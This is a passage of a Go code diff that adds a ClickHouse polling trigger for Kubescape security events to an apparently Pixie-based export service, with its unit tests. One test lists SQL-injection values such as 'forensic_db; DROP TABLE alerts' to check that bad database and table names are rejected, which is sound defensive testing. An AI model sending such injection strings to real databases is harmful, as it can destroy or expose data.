+// receive side of a 64-slot buffered channel that the loop feeds. The loop
+// closes the channel when it exits after ctx is cancelled. The returned
+// error is always nil.
+func (t *ClickHouseHTTP) Subscribe(ctx context.Context) (<-chan kubescape.Event, error) {
+	events := make(chan kubescape.Event, 64)
+	go t.run(ctx, events)
+	return events, nil
+}
+
+// run is the poll loop started by Subscribe. It resolves the starting
+// watermark, polls once immediately and then on every PollInterval tick,
+// and sends each extracted event on out. out is closed when run returns,
+// which happens once ctx is cancelled.
+func (t *ClickHouseHTTP) run(ctx context.Context, out chan<- kubescape.Event) {
+	defer close(out)
+	// Watermark uses event_time as the cursor PLUS a set of row
+	// fingerprints already pushed at that exact event_time. This
+	// closes the race where two kubescape rows share the same
+	// event_time but the second arrives after our previous poll: the
+	// query is `event_time >= watermark` (inclusive) and we skip rows
+	// whose fingerprint we have already seen at the boundary.
+	//
+	// Cold-start order: persistent store > InitialWatermark > 0.
+	// The persistent store is the production answer to "operator
+	// OOMed, restarts, replays 10h of kubescape_logs from 0, every
+	// poll times out, never recovers" — without it any restart on
+	// a busy node is permanently stuck.
+	watermark := t.cfg.InitialWatermark
+	if t.cfg.Watermark != nil {
+		// Bound the load with its own context so a flaky CH doesn't
+		// block start-up indefinitely. The trigger then falls back
+		// to InitialWatermark and we log the failure loudly.
+		loadCtx, cancel := context.WithTimeout(ctx, t.cfg.HTTPTimeout)
+		wm, ok, err := t.cfg.Watermark.Load(loadCtx, t.cfg.Hostname, t.cfg.Table)
+		cancel()
+		switch {
+		case err != nil:
+			log.WithError(err).Warn("trigger: persistent watermark load failed; using InitialWatermark")
+		case ok:
+			watermark = wm
+			log.WithField("watermark", wm).Info("trigger: resumed from persistent watermark")
+		default:
+			log.WithField("initial", t.cfg.InitialWatermark).
+				Info("trigger: no persistent watermark; using InitialWatermark")
+		}
+	}
+	// Cursor is canonical NANOS (F8). Normalize whatever we loaded so a
+	// pre-fix persisted seconds watermark (or a non-seconds InitialWatermark)
+	// is interpreted on the same scale as chNormEventTimeNanos in the SQL.
+	watermark = normalizeEventTimeNanos(watermark)
+	seenAtBoundary := map[string]bool{}
+	ticker := time.NewTicker(t.cfg.PollInterval)
+	defer ticker.Stop()
+
+	// Throttle persistent writes: every successful advance is in
+	// memory immediately, but only flushed to CH at most every
+	// WatermarkSaveInterval. dirty tracks whether the in-memory
+	// watermark differs from what was last persisted.
+	//
+	// The flush is invoked INSIDE pollOnce (not from a ticker case
+	// in the for/select), because the initial pollOnce on a busy
+	// node can block for tens of seconds while it drains 10k events
+	// down a back-pressured channel — during which time the for/
+	// select isn't running and a saveTicker.C tick would never be
+	// observed. Throttling is done with a time.Time comparison.
+	lastSaved := watermark
+	var lastSaveTime time.Time
+	dirty := false
+	flushWatermark := func() {
+		if !dirty || t.cfg.Watermark == nil || watermark == lastSaved {
+			return
+		}
+		if !lastSaveTime.IsZero() && time.Since(lastSaveTime) < t.cfg.WatermarkSaveInterval {
+			return
+		}
+		saveCtx, cancel := context.WithTimeout(ctx, t.cfg.HTTPTimeout)
+		err := t.cfg.Watermark.Save(saveCtx, t.cfg.Hostname, t.cfg.Table, watermark)
+		cancel()
+		if err != nil {
+			log.WithError(err).WithField("watermark", watermark).
+				Warn("trigger: persistent watermark save failed; will retry next interval")
+			return
+		}
+		lastSaved = watermark
+		lastSaveTime = time.Now()
+		dirty = false
+	}
+	// Best-effort final flush so a clean shutdown doesn't lose up
+	// to WatermarkSaveInterval of progress. ctx is cancelled by the
+	// time this runs, hence the detached context.
+	defer func() {
+		if t.cfg.Watermark != nil && dirty {
+			saveCtx, cancel := context.WithTimeout(context.Background(), t.cfg.HTTPTimeout)
+			defer cancel()
+			if err := t.cfg.Watermark.Save(saveCtx, t.cfg.Hostname, t.cfg.Table, watermark); err != nil {
+				log.WithError(err).Warn("trigger: shutdown watermark save failed")
+			}
+		}
+	}()
+
+	pollOnce := func() {
+		// Remember where this poll started: the per-row promotion below
+		// moves watermark inside the loop, so afterwards this is the only
+		// way to tell whether the boundary changed during the poll.
+		startWatermark := watermark
+		rows, maxSeen, err := t.fetchSince(ctx, watermark)
+		// Partial-read tolerance: when the body read is cut short by
+		// HTTP timeout / connection reset, fetchSince returns the rows
+		// it managed to parse + err. We still process those rows so
+		// the watermark advances by what we got; failing to do so was
+		// the second half of the "stuck forever" bug.
+		if err != nil {
+			if len(rows) == 0 {
+				log.WithError(err).Warn("trigger: poll failed")
+				return
+			}
+			log.WithError(err).WithField("partial_rows", len(rows)).
+				Warn("trigger: poll partial — advancing on what parsed")
+		}
+		nextSeen := map[string]bool{}
+		// Periodic in-loop save: when pollOnce is draining a large
+		// initial backlog, the watermark advances long before the
+		// loop exits. Calling flushWatermark every N rows means the
+		// persistent watermark catches up even mid-drain, so a crash
+		// during the drain doesn't replay the whole backlog. Combined
+		// with the time-based throttle inside flushWatermark, this
+		// produces at most one persistent INSERT per WatermarkSaveInterval.
+		const saveEveryN = 256
+		skippedAtBoundary := 0
+		for i, row := range rows {
+			fp := rowFingerprint(row)
+			// Cursor comparisons are in NORMALIZED nanos (F8): the raw
+			// event_time unit is not enforced, so compare on the same scale
+			// as the SQL filter (chNormEventTimeNanos) and maxSeen.
+			evn := normalizeEventTimeNanos(row.EventTime)
+			if evn == watermark && seenAtBoundary[fp] {
+				skippedAtBoundary++
+				continue // already pushed in a prior poll at this exact boundary
+			}
+			ev, err := kubescape.Extract(row)
+			if err != nil {
+				log.WithError(err).Debug("trigger: skip incomplete row")
+				continue
+			}
+			// Promote the per-row (normalized) event_time into the watermark
+			// immediately so flushWatermark below can persist mid-drain.
+			if evn > watermark {
+				watermark = evn
+				dirty = true
+			}
+			select {
+			case out <- ev:
+			case <-ctx.Done():
+				return
+			}
+			if evn == maxSeen {
+				nextSeen[fp] = true
+			}
+			if i > 0 && i%saveEveryN == 0 {
+				flushWatermark()
+			}
+		}
+		if maxSeen > watermark {
+			// Only reachable when the newest row(s) were not pushed (e.g.
+			// Extract failed), so the in-loop promotion stopped short.
+			watermark = maxSeen
+			dirty = true
+		}
+		switch {
+		case watermark > startWatermark:
+			// The boundary moved during this poll. Fingerprints recorded at
+			// the previous boundary can never match again: the dedup check
+			// requires evn == watermark and the fingerprint embeds the row's
+			// event_time. Replace the set instead of merging into it;
+			// merging here kept every old boundary's fingerprints forever
+			// and grew the map without bound.
+			seenAtBoundary = nextSeen
+		case maxSeen == watermark:
+			// no progress this tick — preserve boundary set, optionally extend
+			for fp := range nextSeen {
+				seenAtBoundary[fp] = true
+			}
+			// Paging escape: if every row returned was a boundary-skip AND
+			// the response was at PollLimit capacity, there may be additional
+			// rows at the same normalized event_time that we will never reach
+			// (the SQL ORDER BY has no secondary key, so LIMIT always returns
+			// the same PollLimit rows from the boundary). Advance the watermark
+			// by 1 nanosecond to escape the boundary. In practice this means
+			// at most one nanosecond's worth of events are not re-delivered on
+			// the next poll, which is acceptable: the fingerprint dedup already
+			// tolerates boundary overlap, and we prefer forward progress over
+			// an infinite loop.
+			if skippedAtBoundary > 0 && len(nextSeen) == 0 && len(rows) >= t.cfg.PollLimit {
+				watermark++
+				seenAtBoundary = map[string]bool{}
+				dirty = true
+				log.WithField("watermark", watermark).
+					Warn("trigger: boundary paging escape — advanced watermark by 1ns to unblock poll")
+			}
+		}
+		// Final flush at end of pollOnce — also throttled.
+		flushWatermark()
+	}
+
+	pollOnce()
+	for {
+		select {
+		case <-ctx.Done():
+			return
+		case <-ticker.C:
+			pollOnce()
+		}
+	}
+}
+
+// rowFingerprint returns the hex-encoded SHA-256 of the row's event_time,
+// rule id, hostname and the two detail payloads, joined with NUL bytes.
+// It lets the poll loop dedupe rows at the watermark boundary without
+// trusting kubescape to supply a unique row id.
+func rowFingerprint(r kubescape.Row) string {
+	material := fmt.Sprintf("%d\x00%s\x00%s\x00%s\x00%s",
+		r.EventTime, r.RuleID, r.Hostname, r.K8sDetails, r.ProcessDetails)
+	digest := sha256.Sum256([]byte(material))
+	return hex.EncodeToString(digest[:])
+}
+
+// normalizeEventTimeNanos maps a raw kubescape event_time (UInt64, whose unit
+// the pipeline does not enforce) to canonical UNIX NANOSECONDS using the same
+// magnitude thresholds as controller.eventTimeToTime. This is the fix for the
+// watermark-poison bug (FINDINGS_AND_BACKLOG F8): the trigger's cursor is a
+// monotonic high-water-mark, so without a single canonical unit a stray row in
+// a larger unit (e.g. one nanos row, ~1.78e18) drives the watermark past every
+// real seconds row (~1.78e9) and AE silently stops processing forever. The
+// cursor + the SQL filter both operate on the normalized value so units are
+// always comparable.
+func normalizeEventTimeNanos(et uint64) uint64 {
+ switch {
+ case et < 1e10:
+ return et * 1_000_000_000 // seconds → nanos
+ case et < 1e13:
+ return et * 1_000_000 // millis → nanos
+ default:
+ return et // already nanos
+ }
+}
+
+// chNormEventTimeNanos is the ClickHouse expression equivalent of
+// normalizeEventTimeNanos — used in the trigger SELECT so the >= watermark
+// filter and ORDER BY are unit-agnostic server-side. The thresholds and
+// multipliers must stay in lockstep with the Go function. (UInt64 headroom:
+// the largest pre-normalization input that hits the *1e9 branch is <1e10 and
+// the largest that hits the *1e6 branch is <1e13, so either product is
+// <1e19 < 2^64.)
+const chNormEventTimeNanos = "multiIf(event_time < 10000000000, event_time * 1000000000, " +
+	"event_time < 10000000000000, event_time * 1000000, event_time)"
+
+// fetchSince issues one GET against the ClickHouse HTTP endpoint for this
+// node's rows whose normalized event_time is >= watermark (nanoseconds),
+// ordered by that normalized time and capped at PollLimit rows. It returns
+// the parsed rows and the largest normalized event_time among them. A
+// non-2xx response becomes an error carrying up to 4 KiB of the body;
+// otherwise the result is whatever parseJSONEachRow returns, which may be
+// partial rows together with an error.
+func (t *ClickHouseHTTP) fetchSince(ctx context.Context, watermark uint64) ([]kubescape.Row, uint64, error) {
+	// ORDER BY + LIMIT means catch-up from a stale watermark drains in
+	// ceil(backlog/PollLimit) small polls rather than one giant scan that
+	// would exceed HTTPTimeout. Filter and order both use the NORMALIZED
+	// (nanos) event_time so the cursor is unit-agnostic (F8 fix).
+	sql := fmt.Sprintf(
+		"SELECT RuleID, RuntimeK8sDetails, RuntimeProcessDetails, event_time, hostname "+
+			"FROM %s.%s "+
+			"WHERE hostname = %s AND %s >= %d "+
+			"ORDER BY %s LIMIT %d FORMAT JSONEachRow",
+		t.cfg.Database, t.cfg.Table, quoteCH(t.cfg.Hostname),
+		chNormEventTimeNanos, watermark, chNormEventTimeNanos, t.cfg.PollLimit)
+	params := url.Values{}
+	params.Set("query", sql)
+	target := t.cfg.Endpoint + "/?" + params.Encode()
+
+	req, err := http.NewRequestWithContext(ctx, http.MethodGet, target, nil)
+	if err != nil {
+		return nil, 0, err
+	}
+	if user := t.cfg.Username; user != "" {
+		req.SetBasicAuth(user, t.cfg.Password)
+	}
+
+	resp, err := t.client.Do(req)
+	if err != nil {
+		return nil, 0, err
+	}
+	defer resp.Body.Close()
+
+	if success := resp.StatusCode/100 == 2; !success {
+		snippet, _ := io.ReadAll(io.LimitReader(resp.Body, 4096))
+		return nil, 0, fmt.Errorf("HTTP %d: %s", resp.StatusCode, strings.TrimSpace(string(snippet)))
+	}
+	return parseJSONEachRow(resp.Body)
+}
+
+// parseJSONEachRow decodes ClickHouse JSONEachRow output from r one line at
+// a time and returns the parsed rows plus the largest NORMALIZED (nanos)
+// event_time among them. Reading line-by-line avoids buffering the whole
+// raw response; the parsed rows themselves are still accumulated.
+//
+// Blank lines are ignored. Lines that fail to decode, or whose event_time
+// is not an unsigned integer, are logged at debug level and skipped — one
+// bad line must not block watermark advancement. Only a scanner failure
+// (for example a line longer than the 16 MiB limit, or a read error) is
+// reported, and then the rows parsed so far are returned WITH the error so
+// the caller can still advance on them.
+func parseJSONEachRow(r io.Reader) ([]kubescape.Row, uint64, error) {
+	type rawRow struct {
+		RuleID                string          `json:"RuleID"`
+		RuntimeK8sDetails     string          `json:"RuntimeK8sDetails"`
+		RuntimeProcessDetails string          `json:"RuntimeProcessDetails"`
+		EventTime             json.RawMessage `json:"event_time"`
+		Hostname              string          `json:"hostname"`
+	}
+
+	const (
+		initialLineBuf = 1 << 20 // 1 MiB starting buffer
+		maxLineBuf     = 1 << 24 // 16 MiB hard cap per line
+	)
+	lines := bufio.NewScanner(r)
+	lines.Buffer(make([]byte, initialLineBuf), maxLineBuf)
+
+	var parsed []kubescape.Row
+	var highest uint64
+	for lines.Scan() {
+		line := bytes.TrimSpace(lines.Bytes())
+		if len(line) == 0 {
+			continue
+		}
+
+		var decoded rawRow
+		if err := json.Unmarshal(line, &decoded); err != nil {
+			log.WithError(err).Debug("trigger: skip malformed JSON row")
+			continue
+		}
+		eventTime, err := parseUint64Loose(decoded.EventTime)
+		if err != nil {
+			log.WithError(err).Debug("trigger: skip row with bad event_time")
+			continue
+		}
+
+		parsed = append(parsed, kubescape.Row{
+			EventTime:      eventTime,
+			RuleID:         decoded.RuleID,
+			Hostname:       decoded.Hostname,
+			K8sDetails:     decoded.RuntimeK8sDetails,
+			ProcessDetails: decoded.RuntimeProcessDetails,
+		})
+		// Track the max on the normalized scale (F8): with an unenforced
+		// unit the raw max is not necessarily the latest instant.
+		if normalized := normalizeEventTimeNanos(eventTime); normalized > highest {
+			highest = normalized
+		}
+	}
+	// lines.Err() is nil after a clean EOF, so this covers both outcomes.
+	return parsed, highest, lines.Err()
+}
+
+// parseUint64Loose parses a JSON value that holds a base-10 unsigned
+// integer either as a bare number or as a quoted string. Surrounding
+// whitespace and any leading or trailing double quotes are stripped before
+// parsing; anything else yields the strconv.ParseUint error.
+func parseUint64Loose(raw json.RawMessage) (uint64, error) {
+	digits := strings.Trim(strings.TrimSpace(string(raw)), `"`)
+	return strconv.ParseUint(digits, 10, 64)
+}
+
+// chLiteralEscaper backslash-escapes backslashes and single quotes for use
+// inside a single-quoted ClickHouse string literal. It lives at package
+// scope so the Replacer is built once instead of on every quoteCH call.
+var chLiteralEscaper = strings.NewReplacer(`\`, `\\`, `'`, `\'`)
+
+// quoteCH returns s wrapped in single quotes with embedded backslashes and
+// single quotes escaped, ready to splice into a query as a string value.
+func quoteCH(s string) string {
+	escaped := chLiteralEscaper.Replace(s)
+	return "'" + escaped + "'"
+}
diff --git a/src/vizier/services/adaptive_export/internal/trigger/clickhouse_internal_test.go b/src/vizier/services/adaptive_export/internal/trigger/clickhouse_internal_test.go
new file mode 100644
index 00000000000..8ca780fc3db
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/trigger/clickhouse_internal_test.go
@@ -0,0 +1,104 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package trigger
+
+import (
+ "context"
+ "net/http"
+ "net/http/httptest"
+ "strconv"
+ "strings"
+ "sync"
+ "testing"
+ "time"
+)
+
+// TestNormalizeEventTimeNanos checks that one present-day instant written
+// in seconds, milliseconds or nanoseconds normalizes to the same nanosecond
+// value, and that zero stays zero. This is the heart of the F8 fix: with a
+// single scale, a mixed-unit row cannot drive the watermark past real
+// seconds rows.
+func TestNormalizeEventTimeNanos(t *testing.T) {
+	const (
+		sec   = uint64(1781590000)           // ~now in seconds
+		milli = uint64(1781590000_000)       // same instant in millis
+		nano  = uint64(1781590000_000000000) // same instant in nanos
+	)
+	for _, tc := range []struct {
+		in, want uint64
+	}{
+		{sec, nano},
+		{milli, nano},
+		{nano, nano},
+		{0, 0},
+	} {
+		got := normalizeEventTimeNanos(tc.in)
+		if got != tc.want {
+			t.Errorf("normalizeEventTimeNanos(%d) = %d, want %d", tc.in, got, tc.want)
+		}
+	}
+
+	// The three spellings of the SAME instant must collapse to one value so
+	// the high-water-mark cursor is unit-agnostic.
+	fromSec := normalizeEventTimeNanos(sec)
+	fromMilli := normalizeEventTimeNanos(milli)
+	fromNano := normalizeEventTimeNanos(nano)
+	if fromSec != fromNano || fromMilli != fromNano {
+		t.Fatalf("same-instant s/ms/ns did not normalize equal: s=%d ms=%d ns=%d",
+			fromSec, fromMilli, fromNano)
+	}
+}
+
+// TestFetchSinceFiltersOnNormalizedEventTime captures the query fetchSince
+// sends to a stub server and checks that the lower bound is applied to the
+// NORMALIZED event_time expression against the nanosecond watermark, never
+// to the raw column — the server-side half of the F8 fix that keeps a
+// larger-unit row from poisoning the watermark.
+func TestFetchSinceFiltersOnNormalizedEventTime(t *testing.T) {
+	var (
+		mu       sync.Mutex
+		captured string
+	)
+	handler := func(w http.ResponseWriter, r *http.Request) {
+		query := r.URL.Query().Get("query")
+		mu.Lock()
+		captured = query
+		mu.Unlock()
+		w.WriteHeader(http.StatusOK) // empty body = 0 rows, valid JSONEachRow
+	}
+	srv := httptest.NewServer(http.HandlerFunc(handler))
+	defer srv.Close()
+
+	trg, err := New(Config{Endpoint: srv.URL, Hostname: "node-1", PollInterval: time.Second})
+	if err != nil {
+		t.Fatalf("New: %v", err)
+	}
+
+	const wmNanos = uint64(1781590000_000000000)
+	ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
+	defer cancel()
+	_, _, err = trg.fetchSince(ctx, wmNanos)
+	if err != nil {
+		t.Fatalf("fetchSince: %v", err)
+	}
+
+	mu.Lock()
+	sent := captured
+	mu.Unlock()
+
+	if !strings.Contains(sent, chNormEventTimeNanos) {
+		t.Errorf("query does not normalize event_time; want %q in:\n%s", chNormEventTimeNanos, sent)
+	}
+	// The >= bound must compare the normalized expression against the nanos
+	// watermark, not the raw column.
+	wantPred := chNormEventTimeNanos + " >= " + strconv.FormatUint(wmNanos, 10)
+	if !strings.Contains(sent, wantPred) {
+		t.Errorf("query filter is not normalized-vs-nanos-watermark; want %q in:\n%s", wantPred, sent)
+	}
+	if strings.Contains(sent, "event_time >= ") {
+		t.Errorf("query still uses RAW event_time filter (poison-prone):\n%s", sent)
+	}
+}
diff --git a/src/vizier/services/adaptive_export/internal/trigger/clickhouse_test.go b/src/vizier/services/adaptive_export/internal/trigger/clickhouse_test.go
new file mode 100644
index 00000000000..0595e67392f
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/trigger/clickhouse_test.go
@@ -0,0 +1,243 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package trigger
+
+import (
+ "context"
+ "net/http"
+ "net/http/httptest"
+ "strings"
+ "sync/atomic"
+ "testing"
+ "time"
+)
+
+const canonicalRowJSON = `{"RuleID":"R1005","RuntimeK8sDetails":"{\"podName\":\"redis-578d5dc9bd-kjj78\",\"podNamespace\":\"redis\"}","RuntimeProcessDetails":"{\"processTree\":{\"pid\":106040,\"comm\":\"redis-server\"}}","event_time":"1744477360303026359","hostname":"node-1"}` // one well-formed response row (pid 106040, comm redis-server) shared by the tests in this file
+
+// TestTrigger_Polls_HostnameAndWatermark — every poll filters on this node's
+// hostname, and the poll after the first event uses that event's timestamp as
+// its inclusive lower bound. Race-free: the handler pushes each query string
+// into a buffered channel and the test blocks on it (no sleeps, no shared state).
+func TestTrigger_Polls_HostnameAndWatermark(t *testing.T) {
+	queries := make(chan string, 8)
+	var calls int64
+	srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		n := atomic.AddInt64(&calls, 1)
+		queries <- r.URL.Query().Get("query")
+		if n == 1 {
+			_, _ = w.Write([]byte(canonicalRowJSON + "\n"))
+			return
+		}
+		_, _ = w.Write([]byte(""))
+	}))
+	defer srv.Close()
+	tr, err := New(Config{Endpoint: srv.URL, Hostname: "node-1", PollInterval: 30 * time.Millisecond})
+	if err != nil {
+		t.Fatalf("New: %v", err)
+	}
+	ctx, cancel := context.WithCancel(context.Background())
+	defer cancel()
+	ch, err := tr.Subscribe(ctx)
+	if err != nil {
+		t.Fatalf("Subscribe: %v", err)
+	}
+	select {
+	case ev := <-ch:
+		if ev.Target.Pod != "redis-578d5dc9bd-kjj78" {
+			t.Fatalf("Pod = %q", ev.Target.Pod)
+		}
+		if ev.Target.PID != 106040 {
+			t.Fatalf("PID = %d", ev.Target.PID)
+		}
+		if ev.Hostname != "node-1" {
+			t.Fatalf("Hostname = %q", ev.Hostname)
+		}
+	case <-time.After(500 * time.Millisecond):
+		t.Fatalf("timeout waiting for first event")
+	}
+	// Discard the first query; the second one must carry the advanced watermark.
+	<-queries
+	var lastQuery string
+	select {
+	case lastQuery = <-queries:
+	case <-time.After(500 * time.Millisecond):
+		t.Fatalf("timeout waiting for second poll")
+	}
+	if !strings.Contains(lastQuery, "hostname = 'node-1'") {
+		t.Fatalf("query missing hostname filter: %q", lastQuery)
+	}
+	// SQL wraps event_time in multiIf(...); 1.744e18 is already ns-scale, so it passes through unchanged.
+	if !strings.Contains(lastQuery, ") >= 1744477360303026359") {
+		t.Fatalf("watermark didn't advance to inclusive boundary: %q", lastQuery)
+	}
+}
+
+// TestTrigger_RequiresHostname — New must refuse a Config whose Hostname is empty.
+func TestTrigger_RequiresHostname(t *testing.T) {
+	if _, err := New(Config{Hostname: "", Endpoint: "http://x"}); err == nil {
+		t.Fatal("empty Hostname not rejected")
+	}
+}
+
+// TestTrigger_ContextCancellationClosesChannel — clean shutdown: cancelling ctx closes the event channel.
+func TestTrigger_ContextCancellationClosesChannel(t *testing.T) {
+	srv := httptest.NewServer(http.HandlerFunc(func(http.ResponseWriter, *http.Request) {}))
+	defer srv.Close()
+	tr, _ := New(Config{Endpoint: srv.URL, Hostname: "node-1", PollInterval: 30 * time.Millisecond})
+	ctx, stop := context.WithCancel(context.Background())
+	events, _ := tr.Subscribe(ctx)
+	stop()
+	select {
+	case <-time.After(300 * time.Millisecond):
+		t.Fatalf("channel not closed within 300ms of cancel")
+	case _, open := <-events:
+		if open {
+			t.Fatalf("channel produced after cancel")
+		}
+	}
+}
+
+// TestTrigger_HTTPErrorContinues — a 503 on the first poll must not stop the trigger; a later poll still delivers.
+func TestTrigger_HTTPErrorContinues(t *testing.T) {
+	var attempts int64
+	srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		if atomic.AddInt64(&attempts, 1) == 1 {
+			w.WriteHeader(http.StatusServiceUnavailable)
+			return
+		}
+		row := []byte(canonicalRowJSON + "\n")
+		_, _ = w.Write(row)
+	}))
+	defer srv.Close()
+	tr, _ := New(Config{Endpoint: srv.URL, Hostname: "node-1", PollInterval: 30 * time.Millisecond})
+	ctx, cancel := context.WithCancel(context.Background())
+	defer cancel()
+	events, _ := tr.Subscribe(ctx)
+	select {
+	case <-time.After(500 * time.Millisecond):
+		t.Fatalf("trigger did not recover from transient HTTP 503")
+	case ev := <-events:
+		if ev.Target.Comm == "" {
+			t.Fatalf("got empty Target after recovery")
+		}
+	}
+}
+
+// TestTrigger_DedupesAtWatermarkBoundary — a row that was already emitted
+// and is returned again by a later poll (same event_time) must NOT be
+// re-emitted, while a DIFFERENT row carrying that same event_time must
+// still be emitted exactly once (only the true duplicate is suppressed).
+func TestTrigger_DedupesAtWatermarkBoundary(t *testing.T) {
+ const distinctRowJSON = `{"RuleID":"R0006","RuntimeK8sDetails":"{\"podName\":\"redis-578d5dc9bd-kjj78\",\"podNamespace\":\"redis\"}","RuntimeProcessDetails":"{\"processTree\":{\"pid\":222222,\"comm\":\"redis-cli\"}}","event_time":"1744477360303026359","hostname":"node-1"}`
+ var calls int64
+ srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+ n := atomic.AddInt64(&calls, 1)
+ switch n {
+ case 1:
+ // First poll: the canonical row alone.
+ _, _ = w.Write([]byte(canonicalRowJSON + "\n"))
+ case 2:
+ // Second poll: the SAME canonical row again plus one
+ // DISTINCT row (other RuleID/pid/comm) with an identical
+ // event_time. The trigger must drop the repeat and pass
+ // the distinct row through.
+ _, _ = w.Write([]byte(canonicalRowJSON + "\n" + distinctRowJSON + "\n"))
+ default:
+ _, _ = w.Write([]byte("")) // every later poll: no rows
+ }
+ }))
+ defer srv.Close()
+
+ tr, _ := New(Config{Endpoint: srv.URL, Hostname: "node-1", PollInterval: 30 * time.Millisecond})
+ ctx, cancel := context.WithCancel(context.Background())
+ defer cancel()
+ ch, _ := tr.Subscribe(ctx)
+
+ // Collect events for ~250 ms; at PollInterval=30ms that covers the 3 scripted polls.
+ deadline := time.Now().Add(250 * time.Millisecond)
+ var got []uint64 // PIDs we observed
+ for time.Now().Before(deadline) {
+ select {
+ case ev := <-ch:
+ got = append(got, ev.Target.PID)
+ case <-time.After(20 * time.Millisecond): // idle tick so the deadline is re-checked
+ }
+ }
+ // Expect exactly 2 events: PID 106040 (canonical, emitted once
+ // even though the server returned it twice) and PID 222222 (the
+ // distinct row sharing its event_time, emitted exactly once).
+ if len(got) != 2 {
+ t.Fatalf("got %d events, want 2 (canonical + distinct, no dup); pids=%v", len(got), got)
+ }
+ canonicalSeen, distinctSeen := 0, 0
+ for _, pid := range got {
+ switch pid {
+ case 106040:
+ canonicalSeen++
+ case 222222:
+ distinctSeen++
+ }
+ }
+ if canonicalSeen != 1 {
+ t.Fatalf("canonical row emitted %d times, want 1 (dedup failed)", canonicalSeen)
+ }
+ if distinctSeen != 1 {
+ t.Fatalf("distinct same-event_time row emitted %d times, want 1 (over-aggressive dedup)", distinctSeen)
+ }
+}
+
+// TestTrigger_RejectsInvalidIdentifiers — defensive: New must refuse any
+// Database or Table value that is not a plain identifier, so the config
+// cannot be used as a SQL-injection vector.
+func TestTrigger_RejectsInvalidIdentifiers(t *testing.T) {
+	rejected := []string{
+		"forensic_db; DROP TABLE alerts",
+		"db with space",
+		"123starts_with_digit",
+		"backtick`injection",
+		"forensic_db.kubescape_logs", // dotted (qualified) names are refused too
+	}
+	for _, bad := range rejected {
+		if _, err := New(Config{Endpoint: "http://x", Hostname: "node-1", Database: bad}); err == nil {
+			t.Errorf("New accepted bad Database %q; expected error", bad)
+		}
+		if _, err := New(Config{Endpoint: "http://x", Hostname: "node-1", Table: bad}); err == nil {
+			t.Errorf("New accepted bad Table %q; expected error", bad)
+		}
+	}
+}
+
+// TestTrigger_BadRowSkipped — a row with empty details precedes a good row; the first event must be the good one.
+func TestTrigger_BadRowSkipped(t *testing.T) {
+	payload := []byte(`{"RuleID":"","RuntimeK8sDetails":"","RuntimeProcessDetails":"","event_time":"1","hostname":"node-1"}` + "\n" + canonicalRowJSON + "\n")
+	srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		_, _ = w.Write(payload)
+	}))
+	defer srv.Close()
+	tr, _ := New(Config{Endpoint: srv.URL, Hostname: "node-1", PollInterval: 30 * time.Millisecond})
+	ctx, cancel := context.WithCancel(context.Background())
+	defer cancel()
+	events, _ := tr.Subscribe(ctx)
+	select {
+	case <-time.After(500 * time.Millisecond):
+		t.Fatalf("good row not received after bad-row skip")
+	case ev := <-events:
+		if ev.Target.Comm != "redis-server" {
+			t.Fatalf("got Comm %q; bad row leaked through", ev.Target.Comm)
+		}
+	}
+}
diff --git a/src/vizier/services/adaptive_export/internal/trigger/fingerprint_bench_test.go b/src/vizier/services/adaptive_export/internal/trigger/fingerprint_bench_test.go
new file mode 100644
index 00000000000..2924b2b4df7
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/trigger/fingerprint_bench_test.go
@@ -0,0 +1,142 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package trigger
+
+import (
+ "crypto/sha256"
+ "encoding/hex"
+ "fmt"
+ "strings"
+ "testing"
+
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/kubescape"
+)
+
+// rowFingerprint is the deduper for boundary rows at each poll. It
+// runs ONCE PER kubescape row pulled from ClickHouse by the trigger
+// (clickhouse.go:272-273). With PollLimit=10000 and a 250ms ticker, a
+// trigger that's catching up from a stale watermark can process 40k
+// rows/sec PURELY in the fingerprint loop — every one of which:
+//
+// 1. Allocates a fresh sha256 hasher (sha256.New).
+// 2. Runs fmt.Fprintf with %d/%s verbs into the hasher (uses reflect).
+// 3. Hex-encodes the 32-byte digest into a 64-char string.
+//
+// The bench numbers below quantify that. If the per-row cost is
+// significant, the trigger backlog drain itself is a CPU consumer
+// independent of any downstream work.
+
+// benchKubescapeRow returns a benchmark fixture row. Every field is constant
+// except EventTime, which is offset by i so rows can be made distinct.
+func benchKubescapeRow(i int) kubescape.Row {
+	// The two detail fields are JSON blobs in production; these fixtures
+	// are a few hundred bytes each.
